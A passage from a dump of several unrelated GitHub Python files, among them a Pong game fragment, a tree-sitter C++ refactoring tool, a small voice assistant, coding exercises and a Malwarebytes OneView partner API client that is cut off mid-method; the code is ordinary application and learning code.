PLAYER_TWO_AIMING = \"down\"\r\n\r\ndef main():\r\n global GAME_HAS_STARTED, GAME_BALL_MOVE_SIDE\r\n isRunning = True\r\n gameClock = pygame.time.Clock()\r\n while isRunning:\r\n gameClock.tick(FPS)\r\n print(gameClock)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n # The pong text;\r\n comicFont = pygame.font.SysFont('Comic Sans MS', 50)\r\n pongText = comicFont.render('Pong', 1, (255, 255, 255))\r\n\r\n # The top border;\r\n topBorder = pygame.Rect(0, 80, WIDTH, 10)\r\n\r\n # Checking for movements;\r\n keys_pressed = pygame.key.get_pressed() # Getting the pressed keys;\r\n # Setting the aiming to right-left now so if the players dont move their aiming values are neutral;\r\n movePlayerOne(keys_pressed)\r\n movePlayerTwo(keys_pressed)\r\n\r\n # Checking if game started is false so we can do the ball movement startup now;\r\n if not(GAME_HAS_STARTED):\r\n GAME_HAS_STARTED = True\r\n # Making a simple random-generation to know which side to start the ball to;\r\n if R_randint(0, 1) == 0:\r\n GAME_BALL_MOVE_SIDE = \"left\"\r\n else:\r\n GAME_BALL_MOVE_SIDE = \"right\"\r\n\r\n moveBallF()\r\n\r\n # ReRenderF\r\n reRenderScreen(pongText, topBorder, str(gameClock.get_fps()))\r\n \r\n # Quiting the game\r\n pygame.quit()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"bosdos12/Pong_myfirstpygame-game","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":7465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8176220949","text":"\"\"\"\nThis module is the core of functionality for the library.\n\"\"\"\nfrom typing import Dict, List, Optional, Set, Tuple\n\nfrom tree_sitter import Language, Node, Parser, Tree\n\nfrom remusing_cpp.queries import SymbolQuery, TypeQuery, UsingQuery\nfrom remusing_cpp.symbols import (\n get_default_std_symbols,\n get_default_symb_namespace_map,\n)\nfrom remusing_cpp.ts_model import HashableTreeNode\n\n\nclass RemUsing:\n \"\"\"\n Class to remove `using` declarations and refactor symbol names.\n \"\"\"\n\n def __init__(self, src: bytes, parser: Parser, language: Language):\n \"\"\"\n Initialize the class.\n\n Arguments:\n src: The starting C++ source code\n parser: The C++ tree-sitter parser\n language: The C++ tree-sitter language\n \"\"\"\n self.src = src\n self.parser = parser\n self.language = language\n\n self.types_query = TypeQuery()\n self.symbols_query = SymbolQuery()\n self.using_query = UsingQuery()\n\n self.find_symbols = get_default_std_symbols()\n self.hardcoded_namespace_map = get_default_symb_namespace_map()\n\n self._tree: Optional[Tree] = None\n self._query_str: Optional[str] = None\n self._captures: Optional[List[Tuple[Node, str]]] = None\n self._lookup_captures: Optional[Dict[str, Set[HashableTreeNode]]] = None\n self._unqualified_types: Optional[List[HashableTreeNode]] = None\n self._decl_ns_map: Optional[Dict[str, str]] = None\n\n # API State tracking\n self._did_parse = False\n self._did_query = False\n self._did_process_captures = False\n self._did_fix = False\n\n def parse(self) -> None:\n \"\"\"\n Parse the source code with tree-sitter.\n \"\"\"\n if self._did_parse:\n return\n\n self._tree = self.parser.parse(self.src)\n\n self._did_parse = True\n\n def query(self) -> None:\n \"\"\"\n Run tree-sitter queries on the parsed source code to gather necessary\n information about qualified/unqualified symbols and `using` statements.\n \"\"\"\n if self._did_query:\n return\n else:\n self.parse()\n\n self._query_str = \"\\n\".join(\n [\n self.types_query.build_all_queries(),\n self.symbols_query.build_all_queries(),\n self.using_query.build_all_queries(),\n ]\n )\n query = self.language.query(self._query_str)\n assert self._tree is not None\n self._captures = query.captures(self._tree.root_node)\n\n self._did_query = True\n\n def process_captures(self) -> None:\n \"\"\"\n Process the captured elements that we queried and enable our fixes.\n \"\"\"\n if self._did_process_captures:\n return\n else:\n self.query()\n\n # Collect all captures into a workable representation\n self._lookup_captures = {}\n assert self._captures is not None\n for cap in self._captures:\n cap_node: Node = cap[0]\n cap_name: str = cap[1]\n if cap_name not in self._lookup_captures:\n self._lookup_captures[cap_name] = {HashableTreeNode(cap_node)}\n else:\n self._lookup_captures[cap_name].add(HashableTreeNode(cap_node))\n\n # Gather unqualified identifiers\n all_types = self._lookup_captures.get(self.types_query.TYPE_ALL_CAPTURE, set())\n self._unqualified_types = sorted(\n set.union(\n # We collected _all_ type_identifiers, so we need to filter out the qualified ones\n all_types.difference(\n set.union(\n self._lookup_captures.get(self.types_query.TYPE_QUAL_CAPTURE, set()),\n self._lookup_captures.get(\n self.types_query.TYPE_QUAL_TEMPLATE_CAPTURE, set()\n ),\n )\n ),\n self._lookup_captures.get(self.symbols_query.SYMBOL_CAPTURE, set()),\n self._lookup_captures.get(self.symbols_query.SYMBOL_FUNC_CAPTURE, set()),\n )\n )\n\n # Map of `using` qualified-type declarations from type to namespace\n self._decl_ns_map = {}\n for decl in self._lookup_captures.get(self.using_query.USING_QUAL_TYPE_CAPTURE, []):\n node = decl.node\n name_node = node.child_by_field_name(\"name\")\n scope_node = node.child_by_field_name(\"scope\")\n name = \"\"\n scope = []\n\n # Handle nested scope namespace\n while scope_node and name_node:\n name = name_node.text.decode(\"utf8\")\n scope.append(scope_node.text.decode(\"utf8\"))\n\n scope_node = name_node.child_by_field_name(\"scope\")\n name_node = name_node.child_by_field_name(\"name\")\n\n scope_text = \"::\".join(scope)\n self._decl_ns_map[name] = scope_text\n\n self._did_process_captures = True\n\n def fix(self) -> bytes:\n \"\"\"\n Fix the source code to remove `using` declarations and add namespace\n qualifications to the unqualified symbols.\n\n Returns:\n The new fixed source code.\n \"\"\"\n self.process_captures()\n\n output = b\"\"\n out_idx = 0\n\n assert self._tree is not None\n assert self._lookup_captures is not None\n assert self._unqualified_types is not None\n assert self._decl_ns_map is not None\n\n # Need to sort so that it makes creating the new text easier in one go\n using_decls = self._lookup_captures.get(self.using_query.USING_DECL_CAPTURE, set())\n using_ns = self._lookup_captures.get(self.using_query.USING_NS_DECL_CAPTURE, set())\n fixups = sorted(set.union(set(self._unqualified_types), using_decls, using_ns))\n for node in fixups:\n start_byte = node.node.start_byte\n start_txt = self._tree.text[out_idx:start_byte].decode(\"utf8\")\n\n if node.node.type == \"using_declaration\":\n # Remove these nodes from the output text\n output += start_txt.encode(\"utf8\")\n out_idx = node.node.end_byte\n # Skip newline-like characters\n while chr(self._tree.text[out_idx]) in {\"\\n\", \"\\r\"}:\n out_idx += 1\n elif node.node.type in {\"type_identifier\", \"identifier\"}:\n end_txt = self._tree.text[node.node.start_byte : node.node.end_byte].decode(\"utf8\")\n out_idx = node.node.end_byte\n\n # Lookup namespace from existing 'using '\n ns = self._decl_ns_map.get(node.text, \"\")\n hard = self.hardcoded_namespace_map.get(node.text, None)\n if ns:\n # Insert into text\n output += f\"{start_txt}{ns}::{end_txt}\".encode()\n elif hard:\n # Maybe it's a hardcoded mapping (to handle 'using namespace ')\n output += f\"{start_txt}{hard}::{end_txt}\".encode()\n else:\n # print(f\"WARN: Could not find qualifier for type {node.text}\")\n output += f\"{start_txt}{end_txt}\".encode()\n else: # pragma: no cover\n print(f\"ERROR: Not processing unknown node type: {node.node.type}\")\n output += self._tree.text[out_idx:]\n\n self._did_fix = True\n\n return output\n","repo_name":"ekilmer/remusing_cpp","sub_path":"remusing_cpp/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7513,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"36025368618","text":"from random import shuffle, randrange\nfrom typing import List\n\nfrom game.interfaces.iplayer import IPlayer\n\nfrom game.implementations.players.player import Player\nfrom game.implementations.players.bear import Bear\n\nclass PlayersFactory:\n def __init__(self, players_count: int, bears_count: int, labyrinth_size: int):\n self.players_count = players_count\n self.bears_count = bears_count\n self.labyrinth_size = labyrinth_size\n\n def create(self) -> List[IPlayer]:\n players = []\n\n for i in range(self.players_count):\n player = Player(randrange(self.labyrinth_size), randrange(self.labyrinth_size), index=i)\n players.append(player)\n\n for i in range(self.bears_count):\n bear = Bear(randrange(self.labyrinth_size), randrange(self.labyrinth_size), index=i)\n players.append(bear)\n\n return players\n\n @staticmethod\n def load(data, objects):\n players = []\n for playerData in data:\n if playerData['class'] == \"Player\":\n players.append(Player.load(playerData, objects))\n if playerData['class'] == \"Bear\":\n players.append(Bear.load(playerData))\n return players\n\n @staticmethod\n def dump(players: List[IPlayer]):\n data = []\n for player in players:\n playerData = player.dump()\n playerData['class'] = type(player).__name__\n \n data.append(playerData)\n return data\n","repo_name":"m-rodin/labyrinth_game","sub_path":"game/implementations/players/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39698719645","text":"import datetime\nimport os\nimport wikipedia\nimport pyttsx3\nimport speech_recognition as sr\nimport webbrowser\nimport smtplib\n\n\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n# print(voices[1].id)\nengine.setProperty('voice', voices[1].id)\n\n\n\ndef speak(audio):\n engine.say(audio)\n engine.runAndWait()\n\ndef wishME():\n hour = int(datetime.datetime.now().hour)\n if hour >= 0 and hour < 12:\n speak(\"Good Morning\")\n elif hour >=12 and hour <15:\n speak(\"Good Afternoon\")\n elif hour >=15 and hour <19:\n speak(\"Good Evening\")\n\n speak(\"Hello, My name is Alexandra, Speed 1 terahertz, memory 1 zeta byte, version 1.O\")\n speak(\"How may i help you today?\")\n print(\"How may i help you today?\")\ndef takeCommand():\n '''\n Its take the user voices command and\n respond, do the work for given command as output\n speak(\"I am Alexandra, Sir how may i help you today?\")\n '''\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 1\n audio = r.listen(source)\n try:\n print(\"Recognizing...\")\n query = r.recognize_google(audio, language = 'en-in')\n print(f\"User said: {query}\\n\")\n except Exception as e:\n # print(e)\n print(\"Pardon Sir, but can you repeat again, please...?\")\n speak(\"Pardon Sir, but can you repeat again, please...?\")\n return \"None\"\n return query\ndef sendEmail(to, content):\n server = smtplib.SMTP('smtplib.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.login('sender-email@gmail.com', 'your-email-password') # Put sender's email address and password here (Note: Before sending make that gmail check for less-secure app is enable\n server.sendmail('sender-email@gmail.com', to, content)\n server.close()\n\nif __name__ == '__main__':\n wishME()\n while True:\n # if 1:\n query = takeCommand().lower()\n # Logic for executing tasks based on query\n if 'wikipedia' in query:\n speak(\"Searching Wikipedia...\")\n query = query.replace(\"wikipedia\", \"\")\n result = wikipedia.summary(query, sentences=2)\n speak(\"According to Wikipedia, \")\n print(result)\n speak(result)\n\n elif 'open youtube' in query:\n webbrowser.open(\"youtube.com\")\n elif 'open google' in query:\n webbrowser.open(\"google.com\")\n elif 'open linkedin' in query:\n webbrowser.open(\"linkedin.com\")\n elif 'open music' in query:\n music_dir = \"C:\\\\Users\\\\Omkar Tendolkar\\\\Music\"\n songs = os.listdir(music_dir)\n print(songs)\n os.startfile(os.path.join(music_dir, songs[0]))\n elif 'the time' in query:\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(f\"Sir the time is {strTime}\")\n elif 'open chrome' in query:\n codePath = \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\"\n os.startfile(codePath)\n elif 'email to omkar' in query:\n try:\n speak(\"What should i say?\")\n content = takeCommand()\n to = \"reciever-email@gmail.com\" #Put reciever email here for sending\n sendEmail(to, content)\n speak(\"Email has been sent!\")\n except Exception as e:\n print(e)\n speak(\"Sorry Omkar Sir, I was failed to sent your email\")\n elif 'you stop' in query:\n speak (\"Thank you for using me sir\")\n speak(\"Bye Bye\")\n break\n\n\n","repo_name":"Omkar-Tendolkar/Desktop-Assistant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30396309530","text":"from unittest import TestCase\n\nimport gender_converter\n\n\nclass Test(TestCase):\n def test_convert_gender_when_male(self):\n expected = \"MALE\"\n actual = gender_converter.convert_gender(\"M\")\n\n self.assertEqual(actual, expected)\n\n def test_convert_gender_when_female(self):\n expected = \"FEMALE\"\n actual = gender_converter.convert_gender(\"F\")\n\n self.assertEqual(actual, expected)\n","repo_name":"Riche3488/my-python-app","sub_path":"test_gender_converter.py","file_name":"test_gender_converter.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11541529308","text":"# program to check weather the digit of the number raise to its respective index \n#is equal to the sum of the digit or not\na=int(input(\"Please enter the number\"))\nnum=a\nlst=[i for i in str(num)]\nprint(lst)\nsum=0\nfor i in range(1,len(lst)+1):\n #print(i)\n #print(int(lst[i-1])**i)\n sum=sum+int(lst[i-1])**i\nif sum==a:\n print(\"yes\")\nelse:\n print(\"No\")\n\n","repo_name":"Anshuman366/DSA","sub_path":"AMCAT_qUESTIONS/QUES4.py","file_name":"QUES4.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69962292281","text":"from __future__ import annotations\n\nimport json\nimport base64\nfrom abc import ABC\nfrom typing import Any, Optional, Tuple\nfrom datetime import date\n\nimport requests\nfrom requests import Response\nfrom malwarebytes.account.domain.contracts import AccountRepository, OneViewRepository\nfrom malwarebytes.account.infrastructure.exceptions import (\n AccountDataNotValidException, AccountExistingEmailException, AuthenticationException,\n ConnectionTimeoutException, ConnectionUnauthorizedException, LimitExceeded,\n MalwareBytesException, MalwareBytesServerException, MBClientException, SiteNotValidException,\n TrialSubscriptionNotValidException,\n)\nfrom malwarebytes.account.domain.models import (\n Account, AccountBilling, AccountCreated, AccountId, AccountToInject, Email, MSPAccount,\n)\nfrom malwarebytes.account.application.contracts import Logger\nfrom malwarebytes.account.infrastructure.logger import (\n formatter_api_request,\n formatter_api_response,\n)\n\nVALID_RESPONSE = 200\nACCOUNT_DATA_NOT_VALID = 400\nACCOUNT_DATA_ALREADY_EXIST = 409\nCONNECTION_UNAUTHORIZED = 401\nDATA_NOT_VALID = 500\n\nACCOUNT_CREDENTIALS = 'account_credentials'\nHEADERS_TYPE = 'application/json'\n\nNUMBER_ACCOUNT_PER_PAGE = 200\n\n\nclass APIClient:\n \"\"\"\n API Client to performs the API calls\n \"\"\"\n\n def __init__(\n self,\n mb_oauth_url: str,\n mb_oauth_client_id: str,\n mb_oauth_client_secret: str,\n mb_api_url: str,\n logger: Logger,\n max_retries: int = 3,\n ):\n \"\"\"\n Parameters\n ----------\n mb_oauth_url: str\n OAUTH URL.\n mb_oauth_client_id: str\n Client ID.\n mb_oauth_client_secret: str\n Client Secret.\n mb_api_url: str\n API URL used for send the requests\n logger: Logger\n\n \"\"\"\n self.logger = logger\n self.mb_oauth_url = mb_oauth_url\n self.mb_oauth_client_id = mb_oauth_client_id\n self.mb_oauth_client_secret = mb_oauth_client_secret\n self.host = mb_api_url\n self.max_retries = max_retries\n\n def send(\n self,\n method: str,\n path: str,\n query: Optional[dict] = None,\n body: Optional[dict] = None,\n ) -> Response:\n \"\"\"\n Sends a requests to MalwareBytes API.\n\n Parameters\n ----------\n method: str\n The HTTP method to use.\n\n path: str, None\n The path to the resource.\n\n query: dict, optional\n The parameters of the requests to be sent.\n\n body: dict, optional\n The body of the requests to be sent.\n\n Returns\n -------\n response: Response\n The response\n \"\"\"\n\n retries = 0\n success = False\n\n while retries < self.max_retries and not success:\n retries += 1\n try:\n token = self.get_token()\n headers = {\n 'Authorization': f\"Bearer {token}\",\n 'Content-Type': HEADERS_TYPE,\n 'Accept': HEADERS_TYPE,\n }\n self.logger.info(formatter_api_request(method, self.get_url(path), headers, body))\n\n try:\n response = requests.request(\n method,\n self.get_url(path),\n headers=headers,\n params=query,\n json=body,\n verify=True,\n timeout=(180, 540),\n )\n except ConnectionError as e:\n raise ConnectionTimeoutException(str(e))\n\n self.logger.debug(formatter_api_response(response))\n\n if response.status_code >= 500:\n raise _make_server_error(response)\n\n if response.status_code >= 400:\n raise _make_client_error(response)\n\n success = True\n return response.content\n except AuthenticationException as e:\n self.logger.warning(\"{error} with message {msg} retrying {retries}/{max}\".format(\n error=e.__class__.__name__,\n msg=e,\n retries=retries,\n max=self.max_retries,\n ))\n\n if retries == self.max_retries:\n raise\n\n def get_url(self, action_path: str):\n \"\"\"\n Creates the URL to the resource for the requests.\n\n Parameters\n ----------\n action_path: str\n The path to the resource. It should start with a slash.\n \"\"\"\n return f'{self.host}{action_path}'\n\n def get_token(self):\n \"\"\"\n Get Token.\n \"\"\"\n\n base64_str = base64.b64encode(\n bytes(self.mb_oauth_client_id + ':' + self.mb_oauth_client_secret, 'utf-8'),\n )\n base64_authorization = base64_str.decode('utf-8')\n\n token_url = self.mb_oauth_url + '/oauth2/token'\n payload = 'scope=oneview-partner&grant_type=client_credentials'\n headers = {'Content-Type': 'application/x-www-form-urlencoded',\n 'Authorization': 'Basic ' + base64_authorization}\n\n response = requests.post(token_url, headers=headers, data=payload)\n\n if response.status_code == 200:\n token_data = json.loads(response.content)\n access_token = token_data[\"access_token\"]\n self.logger.debug(formatter_api_response(response))\n else:\n self.logger.error(f\"There was an error try to get Access Token. Error Code: \"\n f\"{response.status_code}\")\n raise AuthenticationException(\n f\"There was an error try to get Access Token. Error Code: {response.status_code} \"\n f\"Message: {response.reason}\")\n\n return access_token\n\n\nclass APIClientOneView:\n \"\"\"\n API Client of OneView\n \"\"\"\n\n def __init__(\n self,\n mb_oauth_url: str,\n mb_oauth_client_id: str,\n mb_oauth_client_secret: str,\n mb_api_url: str,\n logger: Logger,\n max_retries: int = 3,\n ):\n \"\"\"\n Parameters\n ----------\n mb_oauth_url: str\n OAUTH URL.\n mb_oauth_client_id: str\n Client ID.\n mb_oauth_client_secret: str\n Client Secret.\n mb_api_url: str\n API URL used for send the requests\n logger: Logger\n\n \"\"\"\n self.logger = logger\n self.mb_oauth_url = mb_oauth_url\n self.mb_oauth_client_id = mb_oauth_client_id\n self.mb_oauth_client_secret = mb_oauth_client_secret\n self.host = mb_api_url\n self.max_retries = max_retries\n\n def send(\n self,\n method: str,\n path: str,\n query: Optional[dict] = None,\n body: Optional[dict] = None,\n ) -> Response:\n \"\"\"\n Sends a requests to MalwareBytes Oneview API.\n\n Parameters\n ----------\n method: str\n The HTTP method to use.\n\n path: str, None\n The path to the resource.\n\n query: dict, optional\n The parameters of the requests to be sent.\n\n body: dict, optional\n The body of the requests to be sent.\n\n Returns\n -------\n response: Response\n The response\n \"\"\"\n\n retries = 0\n success = False\n\n while retries < self.max_retries and not success:\n retries += 1\n try:\n token = self.get_token()\n headers = {\n 'Authorization': f\"Bearer {token}\",\n 'Content-Type': HEADERS_TYPE,\n 'Accept': HEADERS_TYPE,\n }\n self.logger.info(formatter_api_request(method, self.get_url(path), headers, body))\n\n try:\n response = requests.request(\n method,\n self.get_url(path),\n headers=headers,\n params=query,\n json=body,\n verify=True,\n timeout=(180, 540),\n )\n except ConnectionError as e:\n raise ConnectionTimeoutException(str(e))\n\n self.logger.debug(formatter_api_response(response))\n\n if response.status_code >= 500:\n raise _make_server_error(response)\n\n if response.status_code >= 400:\n raise _make_client_error(response)\n\n success = True\n return response.content\n except AuthenticationException as e:\n self.logger.warning(\"{error} with message {msg} retrying {retries}/{max}\".format(\n error=e.__class__.__name__,\n msg=e,\n retries=retries,\n max=self.max_retries,\n ))\n\n if retries == self.max_retries:\n raise\n\n def get_url(self, action_path: str):\n \"\"\"\n Creates the URL to the resource for the requests.\n\n Parameters\n ----------\n action_path: str\n The path to the resource. It should start with a slash.\n \"\"\"\n return f'{self.host}{action_path}'\n\n def get_token(self):\n \"\"\"\n Get Token.\n \"\"\"\n\n base64_str = base64.b64encode(\n bytes(self.mb_oauth_client_id + ':' + self.mb_oauth_client_secret, 'utf-8'),\n )\n base64_authorization = base64_str.decode('utf-8')\n\n token_url = self.mb_oauth_url + '/oauth2/token'\n payload = 'scope=read write execute&grant_type=client_credentials'\n headers = {'Content-Type': 'application/x-www-form-urlencoded', # specific to my app\n 'Authorization': 'Basic ' + base64_authorization,\n }\n\n response = requests.post(token_url, headers=headers, data=payload)\n\n if response.status_code == 200:\n token_data = json.loads(response.content)\n access_token = token_data[\"access_token\"]\n self.logger.debug(formatter_api_response(response))\n else:\n self.logger.error(f\"There was an error try to get Access Token. Error Code: \"\n f\"{response.status_code}\")\n raise AuthenticationException(\n f\"There was an error try to get Access Token. Error Code: {response.status_code} \"\n f\"Message: {response.reason}\")\n\n return access_token\n\n\ndef _make_server_error(response: Response) -> MalwareBytesException:\n \"\"\"\n Makes a Server Error Exception (error >= 500)\n Parameters\n ----------\n response: Response\n Response from Zoom API\n Returns\n -------\n The MalwareBytesException.\n \"\"\"\n return MalwareBytesServerException(response.text, str(response.status_code), {\n 'response': response,\n })\n\n\ndef _make_client_error(response: Response) -> MalwareBytesException:\n \"\"\"\n Makes a Client Error Exception (400 <= error < 500)\n Parameters\n ----------\n response: Response\n Response from MalwareBytes API\n ReturnsF\n -------\n The MalwareBytesException.\n \"\"\"\n body = response.json()\n message = body.get(\"message\", response.reason)\n code = str(body.get(\"code\", str(response.status_code)))\n\n # Throttling limit is 360 calls per minute.\n # When the limit is reached the API server will respond with a 429 HTTP status code.\n if code in ['429']:\n return LimitExceeded(message, code)\n elif response.status_code == ACCOUNT_DATA_ALREADY_EXIST:\n return AccountExistingEmailException(message, code)\n elif response.status_code == CONNECTION_UNAUTHORIZED:\n return AuthenticationException(message, code)\n elif response.status_code == ACCOUNT_DATA_NOT_VALID:\n return AccountDataNotValidException(message, code)\n\n return MBClientException(message, code, {\n 'response': response,\n })\n\n\nclass OneviewRepository(OneViewRepository, ABC):\n def __init__(self, api_client_oneview: APIClientOneView, logger=None) -> None:\n self.api_client_oneview = api_client_oneview\n self.logger = logger\n\n def create_site(self, body) -> str | None:\n \"\"\"\n Create Site for MSP Account ID\n :param body:\n :return: str\n \"\"\"\n\n new_site = self.api_client_oneview.send(\"POST\", \"/oneview/v1/sites\", body=body)\n\n new_site_dict = json.loads(new_site)\n\n if new_site_dict.get(\"statusCode\"):\n if new_site_dict.get(\"statusCode\") != VALID_RESPONSE:\n self.logger.error(\n f\"It was not possible to create a site due to response of API return an error: \"\n f\"{new_site_dict['message']}\")\n raise SiteNotValidException(new_site_dict)\n\n if len(new_site_dict) == 0:\n return None\n\n self.logger.info(\n f\"New Site create for Account with ID {new_site_dict.get('id')}\")\n\n return new_site_dict.get('id')\n\n def create_trial_subscription(self, site_id, body):\n \"\"\"\n Create Trial Subscription for MSP Account ID\n :param site_id:\n :param body:\n \"\"\"\n\n response_orig = self.api_client_oneview.send(\n \"POST\", f\"/oneview/v2/sites/{site_id}/subscriptions\", body=body)\n\n response = json.loads(response_orig)[0]\n\n if response.get(\"statusCode\"):\n if response.get(\"statusCode\") != VALID_RESPONSE:\n self.logger.error(\n f\"It was not possible to create a trial subscription due to response of API \"\n f\"return an error: {response['message']}\")\n raise TrialSubscriptionNotValidException(response)\n\n self.logger.info(f\"New Trial Subscription created to site Id {site_id}\")\n\n\nclass MBAccountRepository(AccountRepository, ABC):\n def __init__(self, api_client: APIClient, logger=None) -> None:\n self.api_client = api_client\n self.logger = logger\n\n def find(self, email: Email) -> Optional[MSPAccount]:\n \"\"\"\n Search Email in Accounts MalwareBytes.\n :param email:\n :return: Optional[MSPAccount]\n \"\"\"\n\n page_number = 0\n while True:\n # Gets all accounts in MalwareBytes. Api not let us get account by Email.\n accounts_list = self.api_client.send(\n \"GET\", f\"/api/v2/partners/oneview/accounts?page={page_number}&\"\n f\"perPage={NUMBER_ACCOUNT_PER_PAGE}\")\n\n accounts_dict = json.loads(accounts_list)\n msp_accounts = accounts_dict['msp_accounts']\n page_number += 1\n\n for msp_account in msp_accounts:\n if email.value == msp_account.get('owner').get('email'):\n self.logger.info(f\"Account with Email {email.value} found.\")\n return msp_account\n\n if accounts_dict['total_count'] <= NUMBER_ACCOUNT_PER_PAGE or len(msp_accounts) < 1:\n break\n\n self.logger.info(f\"Account with Email {email.value} does not exist\")\n return None\n\n def update(self, account: AccountToInject) -> AccountToInject | AccountCreated:\n \"\"\"\n Return existing account or create a new Account in MalwareBytes.\n :param account:\n :return: MSPAccount\n \"\"\"\n email = Email(account[\"contact\"][\"contact_email\"])\n\n mb_account = self.find(email)\n if mb_account:\n return account\n\n new_account = self._create_account(account)\n return new_account\n\n def get_credentials(\n self, msp_account_id: AccountId, msp_user_id: AccountId) -> Tuple[Any, Any] | None:\n \"\"\"\n Get Credentials for MSP Account ID\n :param msp_account_id:\n :param msp_user_id:\n :return: Tuple[str, str]\n \"\"\"\n\n body = {\n \"client_name\": \"sit magna\",\n \"access\": [\n \"read\",\n \"write\",\n \"execute\",\n ],\n }\n\n credentials = self.api_client.send(\n \"POST\", f\"/api/v2/partners/oneview/credentials/{msp_account_id}/{msp_user_id}\",\n body=body)\n\n credentials_dict = json.loads(credentials)\n\n if len(credentials_dict) == 0:\n return None\n\n self.logger.info(f\"Get Credentials for Account with ID {credentials_dict}\")\n return credentials_dict.get('client_id'), credentials_dict.get('client_secret')\n\n def _create_account(self, account: Account) -> AccountCreated:\n \"\"\"\n Creates a new Account in MalwareBytes\n\n Parameters\n ----------\n account: Account\n The Account to create in MalwareBytes\n\n return: MSPAccount\n The Account created in MalwareBytes\n \"\"\"\n\n response = self.api_client.send(\"POST\", \"/api/v2/partners/oneview/accounts\", body=account)\n\n '''\n statusCode= 400; error= Bad Request\n statusCode= 401; error= Unauthorized\n statusCode= 409; error= Conflict; message= \"Email already in use in Malwarebytes\"\n '''\n response = json.loads(response)\n\n if response.get(\"statusCode\"):\n if response.get(\"statusCode\") == ACCOUNT_DATA_NOT_VALID:\n self.logger.error(\n f\"It was not possible to create the Account {response['message']}\")\n raise AccountDataNotValidException(response)\n elif response.get(\"statusCode\") == ACCOUNT_DATA_ALREADY_EXIST:\n self.logger.error(\n f'Account with Email {account[\"contact\"][\"contact_email\"]} already '\n f'exists')\n raise AccountExistingEmailException(response['message'])\n elif response[\"statusCode\"] == CONNECTION_UNAUTHORIZED:\n self.logger.error(\n 'It was not possible to connect API MalwareBytes, please review your '\n 'credentials.')\n raise ConnectionUnauthorizedException(response['message'])\n\n return response\n\n def find_msp_account_id(self, msp_account_id: AccountId) -> Optional[MSPAccount]:\n \"\"\"\n Search if exist MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: Optional[MSPAccount]\n \"\"\"\n\n # Get account with this msp_account_id\n account = self.api_client.send(\n \"GET\", f\"/api/v2/partners/oneview/accounts?msp_ids={msp_account_id}\")\n\n accounts_dict = json.loads(account)\n msp_account = accounts_dict['msp_accounts']\n\n if not msp_account:\n return None\n\n self.logger.info(\"MSP Account ID found.\")\n return msp_account[0]\n\n def change(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Changed MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Change account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/convert\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Unable to perform Change Account having MSP Account ID \"\n f\"{msp_account_id.value} due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was Changed.\")\n return True\n\n def cancel(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Cancel MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Cancel account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/terminate\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed cancellation due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was cancelled.\")\n return True\n\n def suspend(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Suspend MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Suspend account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/suspend\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed suspend due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was Suspended.\")\n return True\n\n def resume(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Resume MSP Account ID in MalwareBytes\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Resume account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/reactivate\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed reactivation due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Account with MSP Account ID {msp_account_id.value} was Reactivated.\")\n return True\n\n def send_email(self, msp_account_id: AccountId) -> bool:\n \"\"\"\n Send Invite Email.\n :param msp_account_id:\n :return: bool\n \"\"\"\n\n try:\n # Send invite Email account with this msp_account_id\n self.api_client.send(\n \"PUT\", f\"/api/v2/partners/oneview/accounts/{msp_account_id.value}/resend\",\n body={})\n except MBClientException as ex:\n self.logger.error(f\"Failed send invite email due to: {ex.message}\")\n raise\n\n self.logger.info(f\"Email sent to MSP Account ID {msp_account_id.value}.\")\n return True\n\n def get_usage(\n self, msp_account_id: AccountId, star_date: date, end_date: date) -> AccountBilling:\n \"\"\"\n Get usage per Account\n :param msp_account_id:\n :param star_date:\n :param end_date:\n :return:\n 